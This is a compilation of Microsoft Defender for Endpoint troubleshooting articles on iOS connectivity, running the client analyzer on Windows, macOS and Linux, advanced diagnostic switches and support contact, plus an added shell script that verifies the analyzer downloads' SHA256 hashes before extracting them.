After onboarding, it takes a few hours for the device to show up in the Device inventory in the Defender for Endpoint security console. Also, ensure that the device is registered correctly with Microsoft Entra ID and has internet connectivity. For successful onboarding, the device has to be registered via Microsoft Authenticator or Intune Company Portal, and the user needs to sign in using the same account with which the device is registered with Microsoft Entra ID.

Note

Sometimes, the device name is not consistent with that in Microsoft Intune admin
center. The device name in Defender for Endpoint console is of the format
<username_iPhone/iPad model>. You can also use Microsoft Entra device ID to
identify the device in the Defender for Endpoint console.

Data and Privacy

For details about data collected and privacy, see Privacy Information - Microsoft
Defender for Endpoint on iOS.

Connectivity issue on cellular network

If you are facing internet connectivity issues on cellular network, check if Microsoft
Defender for Endpoint has cellular data enabled: Open Settings app > MS Defender >
ensure that "Cellular data" is enabled for MS Defender.

If you still have connectivity issues, check if turning on/off Airplane mode helps resolve
the issue. If the issue persists, send us logs.

Issues on supervised devices with content filter profile installed

There's an issue on supervised devices with Defender for Endpoint content filter
installed. If you observe slowness or latency in internet connectivity on such devices,
uninstall or delete the content filter profile from the device. We're working to resolve
this issue and will update this place once we've a resolution.

Issues during app updates from the app store

By default, apps that are downloaded from the app store are updated automatically. But if there's an issue, you can update the app manually:

On your iOS device, open the App Store.
Tap on Menu (profile icon) on the top-left corner.
Scroll to see any pending updates and release notes. Tap Update next to an app to
update only that app, or tap Update All.

You can also choose to turn off automatic updates. On your iOS device, open the
Settings app > go to App Store > toggle off App Updates to turn off automatic
updates.

If you observe issues when the app is updated through the app store (either automatic
updates or manual updates), you might need to restart the device. If that doesn't resolve
the issue, you can disable the Defender VPN and perform the app update. You can also
provide an in-app feedback to report this issue.

Send in-app feedback

If a user faces an issue which isn't already addressed in the above sections or is unable to resolve it using the listed steps, the user can provide in-app feedback along with diagnostic data. Our team will then investigate the logs to provide the right solution. Users can use the following steps to send feedback:

Open the MSDefender app on the iOS/iPadOS device.
Tap on Menu (profile icon) on the top-left corner.
Tap Send Feedback.
Choose from the given options. To report an issue, select I don't like something.
Provide details of the issue that you're facing and check Send diagnostic data. We
recommend that you include your email address so that the team can contact you
for a solution or a follow-up.
Tap Submit to successfully send the feedback.
Troubleshoot sensor health using Microsoft Defender for Endpoint Client Analyzer
Article • 02/27/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

The Microsoft Defender for Endpoint Client Analyzer (MDECA) can be useful when
diagnosing sensor health or reliability issues on onboarded devices running either
Windows, Linux, or macOS. For example, you may want to run the analyzer on a
machine that appears to be unhealthy according to the displayed sensor health status
(Inactive, No Sensor Data or Impaired Communications) in the security portal.

Besides obvious sensor health issues, MDECA can collect other traces, logs, and
diagnostic information for troubleshooting complex scenarios such as:

Application compatibility (AppCompat), performance, network connectivity, or unexpected behavior related to Endpoint Data Loss Prevention.

Privacy notice
The Microsoft Defender for Endpoint Client Analyzer tool is regularly used by
Microsoft Customer Support Services (CSS) to collect information that will help
troubleshoot issues you may be experiencing with Microsoft Defender for
Endpoint.

The collected data may contain Personally Identifiable Information (PII) and/or
sensitive data, such as (but not limited to) IP addresses, PC names, and usernames.

Once data collection is complete, the tool saves the data locally on the machine
within a subfolder and compressed zip file.

No data is automatically sent to Microsoft. If you are using the tool during
collaboration on a support issue, you may be asked to send the compressed data
to Microsoft CSS using Secure File Exchange to facilitate the investigation of the
issue.
For more information about Secure File Exchange, see How to use Secure File Exchange to exchange files with Microsoft Support.

For more information about our privacy statement, see Microsoft Privacy Statement .

Requirements

Before running the analyzer, we recommend ensuring your proxy or firewall configuration allows access to Microsoft Defender for Endpoint service URLs.

The analyzer can run on supported editions of Windows, Linux, or macOS either before or after onboarding to Microsoft Defender for Endpoint.

For Windows devices, if you are running the analyzer directly on specific machines and not remotely via Live Response, then SysInternals PsExec.exe should be allowed (at least temporarily) to run. The analyzer calls into the PsExec.exe tool to run cloud connectivity checks as Local System and emulate the behavior of the SENSE service.

Note

On Windows devices, if you use the attack surface reduction rule Block
process creations originating from PSExec and WMI commands, you might
want to temporarily configure an exclusion to the ASR rule. Optionally, you
can set the rule to audit or you can disable the rule. Making these
configurations allows the analyzer to run connectivity checks to cloud without
being blocked.


Download the Microsoft Defender for Endpoint client analyzer
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Learn how to download the Microsoft Defender for Endpoint client analyzer on supported Windows, macOS, and Linux operating systems.

Download client analyzer for Windows OS

1. The latest stable edition is available for download from the following URL: https://aka.ms/MDEAnalyzer
2. The latest preview edition is available for download from the following URL: https://aka.ms/BetaMDEAnalyzer

Download client analyzer for macOS or Linux

1. The latest stable edition will be integrated into the Microsoft Defender for Endpoint agent. Ensure that you are running the latest edition for either macOS or Linux.

2. The latest preview edition is available for direct download from the following URL: https://aka.ms/XMDEClientAnalyzer


Run the client analyzer on Windows
Article • 11/01/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

Option 1: Live response

You can collect the Defender for Endpoint analyzer support logs remotely using Live Response.

Option 2: Run MDE Client Analyzer locally

1. Download the MDE Client Analyzer tool or Beta MDE Client Analyzer tool to the Windows device you want to investigate.

The file is saved to your Downloads folder by default.

2. Open your Downloads folder, right-click on MDEClientAnalyzer.zip, and then select Properties.

3. Extract the contents of MDEClientAnalyzer.zip to an available folder.

4. Open a command line with administrator permissions:

a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.

5. Type the following command and then press Enter:

Windows Command Prompt

*DrivePath*\MDEClientAnalyzer.cmd

Replace DrivePath with the path where you extracted MDEClientAnalyzer, for example:

Windows Command Prompt

C:\Work\tools\MDEClientAnalyzer\MDEClientAnalyzer.cmd

In addition to the previous procedure, you can also collect the analyzer support logs using live response.

Note

On Windows 10 and 11, Windows Server 2019 and 2022, or Windows Server
2012R2 and 2016 with the modern unified solution installed, the client analyzer
script calls into an executable file called MDEClientAnalyzer.exe to run the
connectivity tests to cloud service URLs.

On Windows 8.1, Windows Server 2016 or any previous OS edition where Microsoft
Monitoring Agent (MMA) is used for onboarding, the client analyzer script calls into
an executable file called MDEClientAnalyzerPreviousVersion.exe to run connectivity
tests for Command and Control (CnC) URLs while also calling into Microsoft
Monitoring Agent connectivity tool TestCloudConnection.exe for Cyber Data
channel URLs.

Important points to keep in mind

All the PowerShell scripts and modules included with the analyzer are Microsoft-signed. If files were modified in any way, then the analyzer is expected to exit with the following error:

If you see this error, the issuerInfo.txt output contains detailed information about why this happened and the affected file:

Example contents after MDEClientAnalyzer.ps1 is modified:

Result package contents on Windows

Note

The exact files captured may change depending on factors such as:

The version of Windows on which the analyzer is run.
Event log channel availability on the machine.
The start state of the EDR sensor (Sense is stopped if the machine is not yet onboarded).
If an advanced troubleshooting parameter was used with the analyzer command.

By default, the unpacked MDEClientAnalyzerResult.zip file contains the following items.

MDEClientAnalyzer.htm

This is the main HTML output file, which contains the findings and guidance
that the analyzer script run on the machine can produce.

SystemInfoLogs [Folder]

AddRemovePrograms.csv

Description: List of x64 installed software on x64 OS collected from the registry.

AddRemoveProgramsWOW64.csv

Description: List of x86 installed software on x64 OS collected from the registry.

CertValidate.log

Description: Detailed result from the certificate revocation check executed by calling
into CertUtil.

dsregcmd.txt

Description: Output from running dsregcmd. This provides details about the
Microsoft Entra status of the machine.

IFEO.txt

Description: Output of Image File Execution Options configured on the machine.

MDEClientAnalyzer.txt

Description: Verbose text file with details of the analyzer script execution.

MDEClientAnalyzer.xml

Description: XML format containing the analyzer script findings.

RegOnboardedInfoCurrent.Json

Description: The onboarded machine information gathered in JSON format from the
registry.

RegOnboardingInfoPolicy.Json

Description: The onboarding policy configuration gathered in JSON format from the
registry.

SCHANNEL.txt

Description: Details about the SCHANNEL configuration applied to the machine,
gathered from the registry.

SessionManager.txt

Description: Session Manager specific settings gathered from the registry.

SSL_00010002.txt

Description: Details about the SSL configuration applied to the machine, gathered
from the registry.

EventLogs [Folder]

utc.evtx

Description: Export of the DiagTrack event log.

senseIR.evtx

Description: Export of the Automated Investigation event log.

sense.evtx

Description: Export of the Sensor main event log.

OperationsManager.evtx

Description: Export of the Microsoft Monitoring Agent event log.

MdeConfigMgrLogs [Folder]

SecurityManagementConfiguration.json

Description: Configurations sent from MEM (Microsoft Endpoint Manager) for
enforcement.

policies.json

Description: Policy settings to be enforced on the device.

report_xxx.json

Description: Corresponding enforcement results.

See also
Client analyzer overview
Download and run the client analyzer
Data collection for advanced troubleshooting on Windows
Understand the analyzer HTML report

Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .

Run the client analyzer on macOS and Linux
Article • 02/09/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

The XMDEClientAnalyzer is used for diagnosing Microsoft Defender for Endpoint health
or reliability issues on onboarded devices running either Linux or macOS.

There are two ways to run the client analyzer tool:

1. Using a binary version (no Python dependency)
2. Using a Python-based solution

Running the binary version of the client analyzer
1. Download the XMDE Client Analyzer Binary tool to the macOS or Linux machine
you need to investigate.

If you're using a terminal, download the tool by entering the following command:

Console

wget --quiet -O XMDEClientAnalyzerBinary.zip https://aka.ms/XMDEClientAnalyzerBinary

2. Verify the download.

Note

The current SHA256 hash of 'XMDEClientAnalyzerBinary.zip' that is
downloaded from this link is:
'0A8E32B618F278BED60AB6763E9458BA2CD02C99D718E50DCCE51A7DBAC69863'

Console

echo '0A8E32B618F278BED60AB6763E9458BA2CD02C99D718E50DCCE51A7DBAC69863  XMDEClientAnalyzerBinary.zip' | sha256sum -c

3. Extract the contents of XMDEClientAnalyzerBinary.zip on the machine.

If you're using a terminal, extract the files by entering the following command:

Console

unzip -q XMDEClientAnalyzerBinary.zip -d XMDEClientAnalyzerBinary

4. Change to the tool's directory by entering the following command:

Console

cd XMDEClientAnalyzerBinary

5. Three new zip files are produced:

SupportToolLinuxBinary.zip : For all Linux devices
SupportToolmacOSBinary.zip : For Intel-based Mac devices
SupportToolmacOS-armBinary.zip : For Arm-based Mac devices

6. Unzip one of the above three zip files based on the machine you need to investigate.
When using a terminal, unzip the file by entering one of the following commands
based on machine type:

Linux

Console

unzip -q SupportToolLinuxBinary.zip

Intel-based Mac

Console

unzip -q SupportToolmacOSBinary.zip

Arm-based Mac

Console

unzip -q SupportToolmacOS-armBinary.zip

7. Run the tool as root to generate the diagnostic package:

Console

sudo ./MDESupportTool -d

Running the Python-based client analyzer

Note

The analyzer depends on a few extra PIP packages (sh, distro, lxml, pandas),
which are installed in the OS when run as root to produce the result output. If not
installed, the analyzer will try to fetch them from the official repository for
Python packages.

Warning

Running the Python-based client analyzer requires the installation of PIP
packages, which may cause some issues in your environment. To avoid
issues from occurring, it is recommended that you install the packages
into a user PIP environment.

In addition, the tool currently requires Python version 3 or later to be
installed.

If your device is behind a proxy, then you can simply pass the proxy server as
an environment variable to the mde_support_tool.sh script. For example:
https_proxy=https://myproxy.contoso.com:8080 ./mde_support_tool.sh

1. Download the XMDE Client Analyzer tool to the macOS or Linux machine you
need to investigate.

If you're using a terminal, download the tool by running the following command:

Console

wget --quiet -O XMDEClientAnalyzer.zip https://aka.ms/XMDEClientAnalyzer

2. Verify the download:

Console

echo '926DEF4C6857641E205E7978126F7C2CE541D52AEA1C0E194DDB85F7BCFDE3D9  XMDEClientAnalyzer.zip' | sha256sum -c

3. Extract the contents of XMDEClientAnalyzer.zip on the machine.

If you're using a terminal, extract the files by using the following command:

Console

unzip -q XMDEClientAnalyzer.zip -d XMDEClientAnalyzer

4. Change directory to the extracted location:

Console

cd XMDEClientAnalyzer

5. Give the tool executable permission:

Console

chmod a+x mde_support_tool.sh

6. Run as a non-root user to install required dependencies:

Console

./mde_support_tool.sh

7. To collect the actual diagnostic package and generate the result archive file, run again
as root:

Console

sudo ./mde_support_tool.sh -d

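
Both procedures above download an archive, check its SHA256 against the value published on this page, and only then extract and run it as root. The following POSIX shell script is an added example, not part of the Microsoft documentation or of the XMDE tooling, that wires those steps together so that a hash mismatch stops the flow before anything is unzipped or executed. It uses only the file names, download URL and hashes that appear on this page; the function names (expected_hash_for, verify_sha256, support_tool_zip, fetch_binary_analyzer) are this example's own. The digest helper falls back to shasum -a 256 on macOS, where sha256sum is usually absent.

```shell
#!/bin/sh
# Added example (not from the Microsoft docs): verify-before-extract wrapper
# around the binary and Python client analyzer download steps shown above.

# Published SHA256 values for the two downloads, copied from the page. When the
# page publishes a new hash, update these: a stale value makes the check fail
# closed rather than silently accepting a different archive.
expected_hash_for() {
    case "$1" in
        XMDEClientAnalyzerBinary.zip)
            echo '0A8E32B618F278BED60AB6763E9458BA2CD02C99D718E50DCCE51A7DBAC69863' ;;
        XMDEClientAnalyzer.zip)
            echo '926DEF4C6857641E205E7978126F7C2CE541D52AEA1C0E194DDB85F7BCFDE3D9' ;;
        *) echo "no published hash for $1" >&2; return 1 ;;
    esac
}

# sha256_of FILE: print the lowercase hex digest. Works with GNU coreutils
# (sha256sum) and with macOS (shasum -a 256).
sha256_of() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | awk '{print $1}'
    else
        shasum -a 256 "$1" | awk '{print $1}'
    fi
}

# verify_sha256 FILE EXPECTED: return 0 only when the digest matches
# (case-insensitive, since the page prints the hashes in upper case).
verify_sha256() {
    [ -f "$1" ] || { echo "missing file: $1" >&2; return 1; }
    expected=$(printf '%s' "$2" | tr 'A-F' 'a-f')
    actual=$(sha256_of "$1")
    if [ "$actual" = "$expected" ]; then
        return 0
    fi
    echo "SHA256 mismatch for $1: got $actual, expected $expected" >&2
    return 1
}

# support_tool_zip OS ARCH: pick the per-platform archive from step 5 of the
# binary procedure using the output of 'uname -s' and 'uname -m'.
support_tool_zip() {
    case "$1:$2" in
        Linux:*)       echo SupportToolLinuxBinary.zip ;;
        Darwin:arm64)  echo SupportToolmacOS-armBinary.zip ;;
        Darwin:x86_64) echo SupportToolmacOSBinary.zip ;;
        *) echo "unsupported platform: $1/$2" >&2; return 1 ;;
    esac
}

# fetch_binary_analyzer: steps 1 to 6 of the binary procedure. Nothing is
# extracted on a hash mismatch and nothing here runs as root; the final
# 'sudo ./MDESupportTool -d' (step 7) is left to the operator.
fetch_binary_analyzer() {
    archive=XMDEClientAnalyzerBinary.zip
    wget --quiet -O "$archive" https://aka.ms/XMDEClientAnalyzerBinary || return 1
    verify_sha256 "$archive" "$(expected_hash_for "$archive")" || return 1
    unzip -q "$archive" -d XMDEClientAnalyzerBinary || return 1
    cd XMDEClientAnalyzerBinary || return 1
    tool_zip=$(support_tool_zip "$(uname -s)" "$(uname -m)") || return 1
    unzip -q "$tool_zip" || return 1
    echo "verified and extracted; now run: sudo ./MDESupportTool -d"
}
```

Source the file and call fetch_binary_analyzer from the directory where the tool should land; for the Python variant, call verify_sha256 on XMDEClientAnalyzer.zip with expected_hash_for before step 3. The point of keeping the hash table in the script rather than typing it at the prompt is that the value is reviewed once, with the page open, and the check then runs identically on every machine being investigated.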

Command line options

Primary command lines

Use the following command to get the machine diagnostic.

Console

-h, --help            show this help message and exit
--output OUTPUT, -o OUTPUT
                      Output path to export report
--outdir OUTDIR       Directory where diagnostics file will be generated
--no-zip, -nz         If set a directory will be created instead of an
                      archive file
--force, -f           Will overwrite if output directory exists
--diagnostic, -d      Collect extensive machine diagnostic information
--bypass-disclaimer   Do not display disclaimer banner
--mdatp-log {info,debug,verbose,error,trace,warning}
                      Set MDATP log level
--max-log-size MAX_LOG_SIZE
                      Maximum log file size in MB before rotating(Will
                      restart mdatp)

Usage example: sudo ./MDESupportTool -d

Positional arguments

Collect performance info

Collect extensive machine performance tracing for analysis of a performance scenario
that can be reproduced on demand.

Console

-h, --help            show this help message and exit
--frequency FREQUENCY
                      profile at this frequency
--length LENGTH       length of time to collect (in seconds)

Usage example: sudo ./MDESupportTool performance --frequency 2

Use OS trace (for macOS only)

Use OS tracing facilities to record Defender for Endpoint performance traces.

Note

This functionality exists in the Python solution only.

Console

-h, --help            show this help message and exit
--length LENGTH       Length of time to record the trace (in seconds).
--mask MASK           Mask to select which event to trace. Defaults to all

On running this command for the first time, it installs a Profile configuration.

Follow this to approve profile installation: Apple Support Guide.

Usage example: ./mde_support_tool.sh trace --length 5

Exclude mode

Add exclusions for audit-d monitoring.

Note

This functionality exists for Linux only.

Console

-h, --help            show this help message and exit
-e <executable>, --exe <executable>
                      exclude by executable name, i.e: bash
-p <process id>, --pid <process id>
                      exclude by process id, i.e: 911
-d <directory>, --dir <directory>
                      exclude by target path, i.e: /var/foo/bar
-x <executable> <directory>, --exe_dir <executable> <directory>
                      exclude by executable path and target path, i.e:
                      /bin/bash /var/foo/bar
-q <q_size>, --queue <q_size>
                      set dispatcher q_depth size
-r, --remove          remove exclusion file
-s, --stat            get statistics about common executables
-l, --list            list auditd rules
-o, --override        Override the existing auditd exclusion rules file
                      for mdatp
-c <syscall number>, --syscall <syscall number>
                      exclude all process of the given syscall

Usage example: sudo ./MDESupportTool exclude -d /var/foo/bar

AuditD Rate Limiter

Syntax that can be used to limit the number of events being reported by the auditD
plugin. This option sets the rate limit globally for AuditD, causing a drop in all the audit
events. When the limiter is enabled, the number of auditd events is limited to 2500
events/sec. This option can be used in cases where we see high CPU usage from the AuditD
side.

Note

This functionality exists for Linux only.

Console

-h, --help            show this help message and exit
-e <true/false>, --enable <true/false>
                      enable/disable the rate limit with default values

Usage example: sudo ./mde_support_tool.sh ratelimit -e true

Note

This functionality should be used carefully, as it limits the number of events being
reported by the auditd subsystem as a whole. This could reduce the number of
events for other subscribers as well.

AuditD Skip Faulty Rules

This option enables you to skip the faulty rules added in the auditd rules file while
loading them. This option allows the auditd subsystem to continue loading rules even if
there's a faulty rule. This option summarizes the results of loading the rules. In the
background, this option runs auditctl with the -c option.

Note

This functionality is only available on Linux.

Console

-h, --help            show this help message and exit
-e <true/false>, --enable <true/false>
                      enable/disable the option to skip the faulty rules. In
                      case no argument is passed, the option will be true by
                      default.

Usage example: sudo ./mde_support_tool.sh skipfaultyrules -e true

Note

This functionality skips the faulty rules. The faulty rule then needs to be
further identified and fixed.

Result package contents on macOS and Linux

report.html

Description: The main HTML output file that contains the findings and guidance
that the analyzer script run on the machine can produce.

mde_diagnostic.zip

Description: Same diagnostic output that gets generated when running mdatp
diagnostic create on either macOS or Linux.

mde.xml

Description: XML output that is generated while running and is used to build the
HTML report file.

Processes_information.txt

Description: Contains the details of the running Microsoft Defender for Endpoint
related processes on the system.

Log.txt

Description: Contains the same log messages written on screen during the data
collection.

Health.txt

Description: The same basic health output that is shown when running the mdatp
health command.

Events.xml

Description: Additional XML file used by the analyzer when building the HTML
report.

Audited_info.txt

Description: Details on the audited service and related components for Linux OS.

perf_benchmark.tar.gz

Description: The performance test reports. You'll see this only if you're using the
performance parameter.


Data collection for advanced troubleshooting on Windows
Article • 02/27/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender Antivirus

When collaborating with Microsoft support professionals, you might be asked to use the
client analyzer to collect data for troubleshooting of more complex scenarios. The
analyzer script supports other parameters for that purpose and can collect a specific log
set based on the observed symptoms that need to be investigated.

Run MDEClientAnalyzer.cmd /? to see the list of available parameters and their
description:

Switch: -h
Description: Calls into Windows Performance Recorder to collect a verbose general
performance trace in addition to the standard log set.
When to use: Slow application start/launch. When clicking on a button on the app
takes x seconds longer.
Process that you're troubleshooting: One of the following: MSSense.exe,
MsSenseS.exe, SenseIR.exe, SenseNdr.exe, SenseTVM.exe, SenseAadAuthenticator.exe,
SenseGPParser.exe, SenseImdsCollector.exe, SenseSampleUploader.exe, MsMpEng.exe,
NisSrv.exe.

Switch: -l
Description: Calls into built-in Windows Performance Monitor to collect a lightweight
perfmon trace. This scenario can be useful when diagnosing slow performance
degradation issues that occur over time but are hard to reproduce on demand.
When to use: Troubleshooting application performance that could be slow to reproduce
(manifest) itself. We recommend capturing up to three minutes (at most five minutes),
because your data set could get too large.
Process that you're troubleshooting: One of the processes listed under -h.

Switch: -c
Description: Calls into Process Monitor for advanced monitoring of real-time file
system, registry, and process/thread activity. This is especially useful when
troubleshooting various application compatibility scenarios.
When to use: Process Monitor (ProcMon) to initiate a boot trace when investigating a
driver or service or application startup delay related issue. Or applications hosted on
a network share that aren't using SMB Opportunistic Locking (Oplock) properly, causing
application compatibility problems.
Process that you're troubleshooting: One of the processes listed under -h.

Switch: -i
Description: Calls into the built-in netsh.exe command to start a network and Windows
Firewall trace that is useful when troubleshooting various network-related issues.
When to use: When troubleshooting network related issues such as Defender for
Endpoint EDR telemetry or CnC data submission issues, Microsoft Defender Antivirus
Cloud Protection (MAPS) reporting issues, Network protection related issues, and so
forth.
Process that you're troubleshooting: One of the processes listed under -h.

Switch: -b
Description: Same as -c, but the Process Monitor trace will be initiated during the next
boot and stopped only when -b is used again. This scenario can also be used to
investigate a slow boot or slow sign-in.
When to use: Process Monitor (ProcMon) to initiate a boot trace when investigating a
driver or service or application startup delay related issue.
Process that you're troubleshooting: One of the processes listed under -h.

Switch: -e
Description: Calls into Windows Performance Recorder to collect Defender AV Client
tracing (AM-Engine and AM-Service) for analysis of Antivirus cloud connectivity issues.
When to use: When troubleshooting Cloud Protection (MAPS) reporting failures.
Process that you're troubleshooting: MsMpEng.exe

Switch: -a
Description: Calls into Windows Performance Recorder to collect a verbose performance
trace specific to analysis of high CPU issues related to the antivirus process
(MsMpEng.exe).
When to use: When troubleshooting high CPU utilization with Microsoft Defender
Antivirus (Antimalware Service Executable or MsMpEng.exe) if you already used the
Microsoft Defender Antivirus Performance Analyzer to narrow down the /path/process
or /path or file extension contributing to the high CPU utilization. This scenario
enables further investigation of what the application or service is doing to
contribute to the high CPU utilization.
Process that you're troubleshooting: MsMpEng.exe

Switch: -v
Description: Uses the antivirus MpCmdRun.exe command line argument with the most
verbose -trace flags.
When to use: Anytime advanced troubleshooting is needed, such as when
troubleshooting Cloud Protection (MAPS) reporting failures, Platform Update failures,
Engine update failures, Security Intelligence Update failures, False negatives, etc. Can
also be used with -b, -c, -h, or -l.
Process that you're troubleshooting: MsMpEng.exe

Switch: -t
Description: Starts a verbose trace of all client-side components relevant to Endpoint
DLP, which is useful for scenarios where DLP actions aren't happening as expected for
files.
When to use: When running into issues where the expected Microsoft Endpoint Data Loss
Prevention (DLP) actions aren't occurring.
Process that you're troubleshooting: MpDlpService.exe

Switch: -q
Description: Calls into the DLPDiagnose.ps1 script from the analyzer Tools directory
that validates the basic configuration and requirements for Endpoint DLP.
When to use: Checks the basic configuration and requirements for Microsoft Endpoint
DLP.
Process that you're troubleshooting: MpDlpService.exe

Switch: -d
Description: Collects a memory dump of MsSenseS.exe (the sensor process on Windows
Server 2016 or older OS) and related processes.
* This flag can be used with the above mentioned flags.
** Capturing a memory dump of PPL protected processes such as MsSense.exe or
MsMpEng.exe isn't supported by the analyzer at this time.
When to use: On Windows 7 SP1, Windows 8.1, Windows Server 2008 R2, Windows Server
2012 R2 or Windows Server 2016 running with the MMA agent and having performance
(high CPU or high memory usage) or application compatibility issues.
Process that you're troubleshooting: MsSenseS.exe

Switch: -z
Description: Configures registry keys on the machine to prepare it for full machine
memory dump collection via CrashOnCtrlScroll. This would be useful for analysis of
computer freeze issues.
* Hold down the rightmost CTRL key, then press the SCROLL LOCK key twice.
When to use: Machine hanging or being unresponsive or slow. High memory usage (memory
leak): a) User mode: private bytes; b) Kernel mode: paged pool or nonpaged pool memory,
handle leaks.
Process that you're troubleshooting: MSSense.exe or MsMpEng.exe

Switch: -k
Description: Uses the NotMyFault tool to force the system to crash and generate a
machine memory dump. This would be useful for analysis of various OS stability issues.
When to use: Same as for -z.
Process that you're troubleshooting: MSSense.exe or MsMpEng.exe

The analyzer, and all of the scenario flags listed in this article, can be initiated remotely
by running RemoteMDEClientAnalyzer.cmd, which is also bundled into the analyzer
toolset:

Note

When any advanced troubleshooting parameter is used, the analyzer also calls into
MpCmdRun.exe to collect Microsoft Defender Antivirus related support logs. You
can use the -g flag to validate URLs for a specific datacenter region even without
being onboarded to that region. For example, MDEClientAnalyzer.cmd -g EU forces
the analyzer to test cloud URLs in the Europe region.

A few points to keep in mind

When you use RemoteMDEClientAnalyzer.cmd, it calls into psexec to download the tool
from the configured file share and then run it locally via PsExec.exe.

The CMD script uses the -r flag to specify that it is running remotely within SYSTEM
context, and so no prompt is presented to the user.

That same flag can be used with MDEClientAnalyzer.cmd to avoid a prompt to the user
to specify the number of minutes for data collection. For example, consider
MDEClientAnalyzer.cmd -r -i -m 5:

-r indicates that the tool is being run from a remote (or non-interactive) context.

-i is the scenario flag for collection of a network trace along with other related logs.

-m # denotes the number of minutes to run (we used 5 minutes in our example).

When using MDEClientAnalyzer.cmd, the script checks for privileges using net session,
which requires the Server service to be running. If it's not, you will get the error
message "Script is running with insufficient privileges. Run it with administrator privileges
if ECHO is off."


Understand the client analyzer HTML report
Article • 02/15/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

The client analyzer produces a report in HTML format. Learn how to review the report to
identify potential sensor issues so that you can troubleshoot them.

Use the following example to understand the report.

Example output from the analyzer on a machine onboarded to an expired Org ID and
failing to reach one of the required Microsoft Defender for Endpoint URLs:

On top, the script version and script runtime are listed for reference.

The Device Information section provides basic OS and device identifiers to
uniquely identify the device on which the analyzer has run.

The Endpoint Security Details section provides general information about Microsoft
Defender for Endpoint-related processes including Microsoft Defender Antivirus
and the sensor process. If important processes aren't online as expected, the color
will change to red.

On Check Results Summary, you'll have an aggregated count for error, warning, or
informational events detected by the analyzer.

On Detailed Results, you'll see a list (sorted by severity) with the results and the
guidance based on the observations made by the analyzer.

Open a support ticket to Microsoft and include the Analyzer results

To include analyzer result files when opening a support ticket, make sure you use the
Attachments section and include the MDEClientAnalyzerResult.zip file:

Note

If the file size is larger than 25 MB, the support engineer assigned to your case will
provide a dedicated secure workspace to upload large files for analysis.


Provide feedback on the Microsoft Defender for Endpoint client analyzer tool
Article • 02/15/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2

If you have feedback or suggestions that would help us improve the Microsoft Defender
for Endpoint client analyzer, use either of these options to submit feedback:

1. Microsoft Defender portal (security.microsoft.com):

2. Microsoft Defender portal (security.microsoft.com):


Troubleshoot service issues
Article • 07/18/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Want to experience Defender for Endpoint? Sign up for a free trial.

This section addresses issues that might arise as you use the Microsoft Defender for
Endpoint service.

Server error - Access is denied due to invalid credentials

If you encounter a server error when trying to access the service, you need to change
your browser cookie settings. Configure your browser to allow cookies.

Elements or data missing on the portal

If some elements or data are missing on Microsoft Defender XDR, it's possible that proxy
settings are blocking them.

Make sure that *.security.microsoft.com is included in the proxy allowlist.

Note

You must use the HTTPS protocol when adding the following endpoints.

Microsoft Defender for Endpoint service shows event or error logs in the Event Viewer

See Review events and errors using Event Viewer for a list of event IDs that are reported
by the Microsoft Defender for Endpoint service. The article also contains
troubleshooting steps for event errors.

Microsoft Defender for Endpoint service fails to start after a reboot and shows error 577

If onboarding devices successfully completes but Microsoft Defender for Endpoint
doesn't start after a reboot and shows error 577, check that Windows Defender isn't
disabled by a policy.

For more information, see Ensure that Microsoft Defender Antivirus is not disabled by
policy.

Known issues with regional formats

Date and time formats

There are some known issues with the time and date formats.

The following date formats are supported:

MM/dd/yyyy
dd/MM/yyyy

The following date and time formats are currently not supported:

Date format yyyy/MM/dd
Date format dd/MM/yy
Date format with yy. Will only show yyyy.
Time format HH:mm:ss isn't supported (the 12 hour AM/PM format isn't
supported). Only the 24-hour format is supported.

Use of comma to indicate thousand

Use of a comma as a separator in numbers isn't supported. Regions where a
number is separated with a comma to indicate a thousand will only see the use of a dot
as a separator. For example, 15,5 K is displayed as 15.5 K.

Want to experience Microsoft Defender for Endpoint? Sign up for a free trial.

Microsoft Defender for Endpoint tenant was automatically created in Europe

When you use Microsoft Defender for Cloud to monitor servers, a Microsoft Defender
for Endpoint tenant is automatically created. The Microsoft Defender for Endpoint data
is stored in Europe by default.

Related topics
Troubleshoot Microsoft Defender for Endpoint onboarding issues
Review events and errors using Event Viewer


Contact Microsoft Defender for Endpoint support
Article • 12/06/2023

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Want to experience Defender for Endpoint? Sign up for a free trial.

Defender for Endpoint has recently upgraded the support process to offer a more
modern and advanced support experience.

The new widget allows customers to:

Find solutions to common problems
Submit a support case to the Microsoft support team

Prerequisites

It's important to know the specific roles that have permission to open support cases.

At a minimum, you must have a Service Support Administrator or Helpdesk
Administrator role.

For more information on which roles have permission, see Security Administrator
permissions.

For general information on admin roles, see About admin roles.

Access the widget

Accessing the new support widget can be done in one of two ways:

1. Clicking on the question mark on the top right of the portal and then clicking on
"Microsoft support":

2. Clicking on the Need help? button in the bottom right of the Microsoft Defender
portal:

In the widget you'll be offered two options:

Find solutions to common problems
Open a service request

Find solutions to common problems

This option includes articles that might be related to the question you may ask. Just start
typing the question in the search box and articles related to your search will be surfaced.

In case the suggested articles aren't sufficient, you can open a service request.

Open a service request

Learn how to open support tickets by contacting Defender for Endpoint support.

Note

If you have a premier support contract with Microsoft, you'll see the premier tag on
the widget. If not, contact your Microsoft account manager.

Contact support

1. Fill in a title and description for the issue you are facing, and the phone number and
email address where we may reach you.
2. (Optional) Include up to five attachments that are relevant to the issue to provide
additional context for the support case.
3. Select your time zone and an alternative language, if applicable. The request will
be sent to the Microsoft Support Team. The team will respond to your service request
shortly.

Related topics
Troubleshoot service issues
Check service health


Troubleshoot Microsoft Defender for Endpoint live response issues
Article • 02/16/2024

Applies to:

